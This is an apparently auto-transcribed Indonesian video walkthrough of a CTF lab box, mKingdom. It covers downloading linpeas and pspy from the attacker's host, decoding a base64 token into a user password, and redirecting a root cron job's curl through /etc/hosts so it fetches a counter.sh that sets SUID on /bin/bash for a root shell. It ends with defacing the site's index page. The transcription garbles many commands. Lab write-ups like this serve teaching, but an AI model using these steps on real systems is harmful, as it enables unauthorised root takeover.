Nah, di sini kita ada, saya ada, mungkin adakah di sini linpis. Ini ada linpis.sh. Nah, saya coba untuk up si linpisnya dengan menggunakan Python 3 min-m http.server. Kita lari di port 80. Nah, jadi kita bisa dari sini kita coba cd/tmp, kita widget IP kita http://IP kita itu 10.21.7.1.linpis.sh. Oke, dia berhasil dan kita coba ls linpis kita sudah masuk ke sini dan kita chmod plus x untuk biar bisa dieksekusi linpis. Nah, di sini kita coba clear dan kita coba kecilin sedikit biar linpisnya agak nggak bisa juga. Oke, nah kita coba jalankan ./linpis.sh. Nah, kita lihat di sini. Linpis ini adalah Linux Privilege Escalation Gesture atau mencari mana yang bisa dibuat untuk sebagai ini Linux Privilege Escalation untuk menaikkan eskalasi privilege kita gitu. Jadi kita dari Towat, user Towat, kita akan coba mencari cara supaya bisa kita masuk ke user di atasnya gitu. Ini ada banyak macam-macamnya. Nah, kita nggak tahu nih ada apa-apa aja. Capabilities-nya, di Towat juga ada kayaknya ini. Terus kita coba jalanin aja terus dulu, nanti kita coba lihat ininya, filenya apa yang ada gitu. Nah, seharusnya sih di sini juga kedapat tadi si Towat password itu tadi di database-nya. Coba kita lihat-lihat aja. Kita coba buka dari atas sekali, terus nanti kita coba turun ke bawah pelan-pelan. Oke. Sudo versionnya saya nggak tahu nih. Sudo version ini sepertinya bisa dinaikin privilege-nya. Nah, ini linpis kita tadi, kita coba lihat pelan-pelan di linpisnya. Oke. Linux version 4444 di sini dianggap si linpis itu bisa harus dicek. Kalau dia label merah kayak gini harus perlu dicek. Ini nggak tahu apakah bisa dieksploit atau tidak. Silakan dilakukan percobaan gitu. Nah, di sini kita coba lihat lagi sistem informationnya, sudo versionnya. Terus di sini, nah ini yang kalau yang sudah biasa sih saya nggak pernah melihat ini ada yang namanya PWD token. Yang biasanya itu adalah PWD-nya aja gitu. Power directory-nya di mana? Nah, ini kok ada PWD token di sini. Nah, ini saya coba copy. Nanti coba kita lihat lagi. Nah, di sini ada linpis, Towat, dan harusnya dia ada ngecek yang lain lagi gitu. Nah, ini si tokennya tadi. Nah, biasanya itu cuman ini yang sering saya lihat itu di sini. Yang saya sering melakukan linpis itu biasanya saya lihat cuman PWD. Tadi itu ada PWD token gitu. Nah, ini dan dia bisa untuk vulnerable CVE kayaknya exploit together, bisa dilihat di exploit DB. Ini semacam rootkit sepertinya ya, available untuk rootkit. Nah, ini ada MySQL, ada root juga. Ini PS-nya kita itu ada di sini sebenarnya. Tadi yang kita www.data naik ke binbash, kita masuk ke Towat di sini, binbash, lakukan psef di sini dia. Nah, ini harusnya kita sudah sebagai root loh di Towat di sini tadi karena pakai super user di sini untuk melakukan Towatnya. Nah, di sini dia
bisa untuk read untuk DAC research. Oke. Devlog bisa kita tulisin, X11 ada, ETH0 nya ada, dan di sini juga ada sesuatu yang aneh nih, mKingdom nih. Saya lihat di sini URL-nya itu dia satunya ini berlain sendiri. Nah, nanti ini ada bahasannya ya. Nah, di sini dia ada listen 3306 di mana port untuk MySQL, dan configuration-nya di sini ada root, ada sistem Mario dan Toad. Ini ada Mario sepertinya di PTS. Mario kok login di sini? TS14 saya nggak tahu. Useful information software, MySQL, dan di sini kita lihat nih user authentication string, root localhost, root mKingdom. Dan kita bisa bikin root juga di sini, MySQLD, passwordnya itu default conf, lalu URL, FTP kebuka, tapi portnya nggak bisa diakses dari luar. Storage database. Nah, ini harusnya dia ngebaca nih kan yang tadi config database ini. Nah, ini dia. Passwordnya apa nih? Toad is the best nih. Catat tadi. Nah, ini ada PGP signature. Nggak tahu gunanya untuk apa. Ada printer, BSD Linux, Apple. Dan Capnet Raw. Credential FSTab atau MFTab nih ya, saya nggak tahu ini seperti apa. Permission in init D dan system D dan rc.d. Saya belum mendapatkan pengetahuan di sini untuk melakukan elektrik FSTab dan MSTab. Oke. Di sini kita ada GPG conf dan ada ininya tadi. Dan yang kita lihat tadi itu adalah di environment-nya. Nah, ini dia tadi, ini yang lain-lainnya. Dan di sini yang saya lihat itu, coba kita Ctrl V kan di sini. Nah, di sini dia ada ini ya, PWD token. Nah, di sini sebenarnya PWD token ini kalau saya coba echo dan kita lakukan di sini base 64 min d, kita ada ikan tantes sini. Nah, saya nggak tahu nih kalau kita masukkan sebagai Sumario, kita masukkan passwordnya sebagai si ikan tantes ini, kita masuk sebagai Mario di sini. Nah, ini yang agak sedikit lama juga saya untuk privilege escalation-nya. Jadi ketika saya sudah tahu, oh ternyata begini, nah masuknya ke sini. Nah, di Mario sendiri kita coba lihat sudo min l-nya. Kita pastikan passwordnya lagi. Nah, di sini dia bisa environment reset dan bisa user bin ID. Nah, ini saya nggak tahu nih apakah kalau kita bikin sudo ID ini kita masuk sebagai root, saya nggak tahu sudo ID itu caranya gimana untuk bisa masuk ke root. Saya sudah coba sudo ID, terus saya coba bikin min help. Nah, di sini dia cuma begini doang. Nah, saya nggak tahu nih di min help ini ada apanya di sini gitu. Cara untuk komen, untuk melarikan ke komen itu saya nggak tahu deh. Cara ininya gitu untuk dia bisa ambil ini gitu. Atau more sudo ID
kayaknya nggak bisa deh, karena yang di more sudo. Jadi kalau sudo man id juga nggak bisa root gitu. Nah di sini untuk masuk ke rootnya itu kita mempunyai trik gitu. Triknya itu kita harus lihat proses apa yang berjalan sebagai root di sini. Nah jadi kita coba lihat di sini psaf Nah ini kita masuk tadi nih, ini kita nih PID kita. Jadi kalau di kill di sini kita bisa mati nih. Di sini bisa error kita kalau di ininya PID-nya di kick ya. Nah kita ini masuk tadi sebagai bus shell, kita masuk jadi toad, dan kita di toad ini kita masuk sebagai Mario, dan kita sini sudah masuk sebagai Apache di Mario-nya. Nah itu. Nah dari Mario ini kita coba eskalasi privilege yang cukup canggih di sini ya. Jadi saya coba lihat dulu di terminal saya ini. Tadinya ada yang namanya where is it? Harusnya ada PSPy gitu. Nah ini PSPy 64. Jadi kita coba ambil ini dan kita naikin ke sini gitu. Coba kita wget http 2/10.10.7.33/PSPy 64. Ini untuk saya nggak tahu ya ini apa panjangannya ini, tapi kalau saya menyebutnya sih proses spy. Jadi proses spy itu kita lihat di sini sudah naik ke PSPy ya, udah. Dan kita coba ls-la, PSPy kita itu belum bisa dilakukan gitu. Dia cuma read aja, belum ada execute-nya. Harusnya seperti limpis. Jadi kalau kita ./pspy 64 dia belum bisa jalan nih, permission denied. Nah, jadi kita harus bikin chmod +x pspy 64 supaya kita bisa execute .pspy 64. Jadi kalau kita ls-la lagi di sini, kita sudah ada permission untuk melakukan execute-nya. Jadi kita bisa ./pspy 64. Kita bisa melihat nanti ada proses apa sih yang dilakukan oleh si root nih. Ini UID 0 ini adalah si root-nya. Nah, dan si root itu ada nih si URL kayak mykingdom.thm 85 castle application counter.sh. Nah, ini apa sih di ini? Kita bisa lihat nih, copy. Nah, coba kita Ctrl C di sini. Nah, dia ada si URL mykingdom.tsm 85 app castle.ini. Nah, kalau kita coba lihat ini, apakah kita punya hak untuk merubah di sini? Coba kita ls-la Ctrl V linknya si counter.sh ini kita nggak ada akses, cannot access nih, kita nggak bisa mengakses si counter.sh ini. Tapi kita tahu bahwa si root itu melakukan si URL ke sini dan dia langsung melakukan bus dan nulis ke parlog upload gini. Nah, kalau kita lihat di parlog upload ini, saya coba pakai res parlog up. Nah, ini dia ada folder and files in the castle app. Nah, ini nggak ada nih. Jadi coba kita end di sini. Caranya saya coba copy ini counter.sh ini. Caranya itu kita kan di netcat nih. Nah, saya coba buka satu file lagi di port 85. Coba besarin. Saya coba bikinkan satu folder echo misalnya ini. Saya coba pastikan dulu dia supaya ini. Nah, saya coba bikin satu folder di sini mkdir
app, terus kita mkdir castle app castle, terus kita bikin lagi mkdir application castle sama dia kan, cd/app castle mkdir v application. Saya takut ada salah type, jadi saya coba untuk seperti ini. Kita cd ke application. Di sini kita bikin satu file, misalnya kita vim counter.sh, kita samakan dengan yang ini ya, counter.sh ini. Nah di sini trikinya kita coba bikinkan supaya nggak terlalu banyak netcat. Sebenarnya sih kita bisa bikin netcat di sini. Saya coba cuma masukkan /bin/bus. Nah, saya di sini cuma bikin satu chmod plus s c/bin/bus. Nah, jadi tugasnya itu kita coba cd ke mkingdom lagi. Nah, kita sudah ada folder app si mkingdom, app, castle dan application. Nah, tugasnya itu nanti kita coba lihat di sini. Kita coba clear ls-la si /bin/bus. Nah, di sini kita lihat ini dia masih rwxr ya. Nah, nantinya kalau kita coba tambahkan dia ada huruf s-nya di sini di tengah-tengah ini ya. Jadi dia tugasnya tadi yang saya bikin di itu tuh adalah ya, misalnya coba ini saya clear, saya coba get ini nggak mau nah ini tugasnya untuk bikin dia jadi suite binary yang bisa melakukan privilege escalation gitu. Nah, di sini kita coba up si Python-nya, Python 3 -m http://server di port 85. Nah, jadi IP kita itu 10.21.733. Kita redirect dari si v/etc/host. Nah, di sini kita coba rubah si mkingdom-nya ini menjadi IP kita gitu, karena dia 21. Di sini kita coba insert, kita hapus. Bagaimana nih cara penggunaan v-nya ini? Coba escape dulu, coba nano /etc/host. Nah, di sini si mkingdom-nya ini kita coba rubah ke IP kita. Jadi ketika di URL tadi si URL tadi seharusnya kita sudah langsung dijalankan di server kita 10.21.7.33. Kita Ctrl X, save modification, yes, baru kita enter. Kita coba pastikan lagi cat /etc/host, dan di sini sudah IP kita, dan coba kita ls-la /bin/bus. Nah, di sini dia masih rwx. Kita lihat di sini dia sampai ada yang ngambil ke server kita gitu. Jadi kita tinggal nunggu aja si counter.sh kita itu sudah dijalankan apa enggak, ada yang si URL enggak ke server kita ini gitu. Begitu dia ada ngambil di sini, harusnya sih dia sudah langsung masuk ke ininya, sudah nambah S gitu. Nah, coba kita tunggu di sini. Ini dia sudah get nih, get counter.sh. Nah, seharusnya kalau kita ls-la di sini
ls-bin-nya itu dia sudah berwarna merah dan sudah ada sweet file di sini. Nah, jadi kita sudah bisa bikin /bin/bus, kita bikin tag p untuk masuk sebagai root. Nah, kita coba bisa dibikin who am I. Di sini kita sudah sebagai root. Ya, jadi untuk ngelihat si flagnya tadi ya kita cuma lihat aja, misalnya kita find /min type f min name bintang.txt. Misalnya kita mau cari user.txt ya, user.txt. Kita buang semua yang error itu ke def null, jadi nggak ditulis sama dia yang nggak kelihatan. Loh, kenapa tidak ada ls/home/Mario. Nah, ini sebenarnya ada sih di si Mario itu ada user.txt. Begitu. Jadi kita sebenarnya sudah bisa sih di sini untuk ngedit si Mario-nya user.txt, dan kita coba cd /root ls-la, kita ada root.txt. Nah, di sini kita sebenarnya sudah bisa menyelesaikan pertanyaannya tadi. Apakah isi user.txt dan apa isi root.txt, ini isinya ya. Saya sudah menyelesaikan, jadi saya tidak perlu untuk di sini. Nah, sampai di sini pelajaran kita tadi. Ada beberapa pelajaran yang kita pelajarin. Di antaranya itu kita bisa mencari folder tadi. Nah, di sini kita coba cd /var/www/html. Nah, coba kita ls-la. Nah, coba kita bikin echo center /h1 please subscribe /h1 /center ke index.html. Nah, sebelumnya servernya itu seperti ini, dan ketika kita enter event not found, mana dia kok nggak ada nih echo ini, copy dia, kita tulis di /var/www/html /index.html. Event not found, kenapa sih dia nggak bisa ditulisin? Nano index.html. Nah, ini aja sih kita hapus, bisa ini sepertinya. Content color text white, image-nya kita hapus. Display block margin, class text. Nah, ini biar nggak sedikit ini ya. Nah, coba kita hapus. You never learn, dia bilang. Kok never learn? Di sini kita bikin learn some, get some. Oke, Ctrl X, yes, enter.
Nah, coba kita lihat di sini dan coba kita refresh. Learn some, get some. Oke, sampai di sini aja dan kita akhiri sampai di sini. Terima kasih sudah menonton. Jangan lupa di like atau di share. Kalau untuk mau di subscribe itu terserah. Itu hak ada walaupun itu gratis. Dan jangan lupa untuk berbagi. Terima kasih dan bye bye. Reset. Close aja dah. Sini kita Ctrl C. Ini ada beberapa kali demo. Nah, dan di sini Ctrl C. Dan VPN-nya juga saya Ctrl C dan di sini kita terminate mesinnya. Oke. Dan sampai ketemu lagi. Coba akhirin end stream.